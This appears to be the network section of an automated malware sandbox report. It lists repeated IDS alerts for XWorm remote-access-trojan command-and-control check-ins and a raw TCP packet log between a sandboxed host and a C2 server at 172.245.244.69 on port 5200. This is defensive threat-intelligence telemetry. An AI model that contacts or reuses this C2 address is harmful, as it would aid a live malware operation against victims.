              2024-12-24T11:29:37.846437+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:37.852594+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:38.050741+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:38.052245+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:48.736479+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:48.738135+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:54.502249+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:54.512232+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:29:55.330883+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:29:55.332454+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:04.073227+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:04.077044+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:04.314256+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:06.173980+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:06.175853+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:10.298346+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:10.299985+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:10.490367+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:10.495047+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:15.438980+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:15.440562+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:15.642570+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:15.644058+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:15.876503+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:15.878620+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:28.698540+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:28.701122+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:31.704643+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:31.706258+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:31.962577+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:31.964910+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:32.158493+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:32.280984+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:34.360302+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:36.784873+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:36.790933+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:37.439402+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:37.443240+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:37.642142+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:37.643551+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:37.754785+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:37.763343+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:37.876731+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:37.882998+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:38.735990+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:38.737479+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:42.220836+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:42.224585+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:42.900893+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:42.909048+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:52.125723+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:52.129017+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:53.346873+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:53.348716+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:53.547373+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:53.549068+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:54.158191+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:54.162909+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:30:58.641803+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:30:58.643299+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:31:04.360023+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:31:06.579489+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:31:06.582926+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP
              2024-12-24T11:31:10.562881+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1172.245.244.695200192.168.2.549710TCP
              2024-12-24T11:31:10.563870+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549710172.245.244.695200TCP

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Dec 24, 2024 11:27:15.032975912 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:27:15.152605057 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:27:15.152802944 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:27:15.594209909 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:27:15.713634968 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:27:28.636388063 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:27:28.755902052 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:27:29.137140036 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:27:29.157026052 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:27:29.276612997 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:27:34.318394899 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:27:34.368108034 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:27:41.681054115 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:27:41.800705910 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:27:42.161478043 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:27:42.163194895 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:27:42.282680035 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:27:54.728205919 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:27:54.847762108 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:27:55.176764011 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:27:55.182702065 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:27:55.302205086 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:04.239989042 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:04.290057898 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:07.774808884 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:07.894490004 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:08.110137939 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:08.111637115 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:08.231091976 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:17.431212902 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:17.550817013 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:17.550889969 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:17.670538902 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:17.962675095 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:17.964946985 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:18.085506916 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:18.154571056 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:18.156536102 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:18.278018951 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:29.962306976 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:30.081836939 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:30.317032099 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:30.322102070 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:30.441720963 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:32.993407965 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:33.113835096 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:33.113959074 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:33.233506918 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:33.489741087 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:33.539969921 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:33.681535959 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:33.727549076 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:33.797868013 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:33.917417049 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:33.917464018 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:34.037043095 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:34.332061052 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:34.430588961 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:43.728774071 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:43.848354101 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:44.253983021 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:44.258853912 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:44.378591061 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:51.305919886 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:51.425398111 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:51.800841093 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:51.812752008 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:51.932271004 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:53.399662971 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:53.519239902 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:53.785176039 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:28:53.788402081 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:28:53.907995939 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:02.524588108 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:02.644598007 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:02.974065065 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:02.975687027 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:03.212140083 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:04.441147089 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:04.463758945 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:04.583206892 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:04.806062937 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:04.863672018 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:04.914947987 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:04.925596952 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:04.925640106 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:05.045203924 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:05.045330048 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:05.164798021 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:05.262059927 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:05.264128923 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:05.356918097 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:05.383724928 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:05.383842945 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:05.503381014 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:05.548990965 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:05.551151991 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:05.670612097 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:05.670738935 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:05.790288925 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:06.284364939 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:06.288161039 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:06.407689095 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:11.196547985 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:11.316083908 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:11.643651962 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:11.645831108 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:11.765348911 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:16.899843931 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:17.019442081 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.019500017 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:17.139122009 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.315187931 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.316966057 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:17.436608076 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.582556009 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.584264040 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:17.703979015 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.775317907 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.776910067 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:17.896533966 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.896636963 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:18.016227007 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:18.822252035 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:18.941976070 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:19.190382004 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:19.192353964 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:19.312050104 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:24.415268898 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:24.534883976 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:24.783837080 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:24.786408901 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:24.906291008 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:34.346903086 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:34.399346113 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:37.462461948 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:37.582077026 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:37.649775982 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:37.769377947 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:37.846436977 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:37.852593899 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:37.972193956 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:38.050740957 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:38.052244902 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:38.171799898 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:48.399708033 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:48.519406080 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:48.736479044 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:48.738135099 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:48.857707024 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:54.058505058 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:54.178225040 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:54.502249002 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:54.512232065 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:54.631834984 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:54.930932999 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:55.050601959 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:55.330883026 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:55.332453966 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:55.452219009 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:03.696470022 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:03.816071033 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:04.073226929 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:04.077044010 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:04.196765900 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:04.314255953 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:04.368529081 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:05.821472883 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:05.941077948 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:06.173979998 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:06.175853014 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:06.295478106 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:09.587235928 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:09.706815958 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:09.706887960 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:09.826495886 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:10.298346043 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:10.299984932 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:10.419527054 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:10.490366936 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:10.495047092 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:10.614732027 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:14.977981091 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:15.098016024 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.098108053 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:15.217807055 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.290654898 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:15.410306931 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.438980103 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.440562010 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:15.600811958 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.642570019 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.644057989 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:15.763957024 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.876502991 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.878619909 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:16.087702036 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:28.363342047 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:28.483212948 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:28.698539972 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:28.701122046 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:28.821072102 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:31.306024075 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:31.425436974 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:31.425477982 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:31.545011044 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:31.545100927 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:31.664547920 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:31.704643011 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:31.706258059 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:31.825783968 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:31.962577105 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:31.964910030 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:32.084388018 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:32.154804945 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:32.158493042 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:32.278021097 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:32.280983925 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:32.400558949 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:34.360301971 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:34.415103912 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:36.309220076 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:36.428772926 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:36.784873009 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:36.790932894 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:36.912759066 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:36.962009907 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.081568003 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.081619024 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.203946114 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.203994036 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.323442936 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.323545933 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.439402103 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.443154097 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.443239927 CET497105200192.168.2.5172.245.244.69
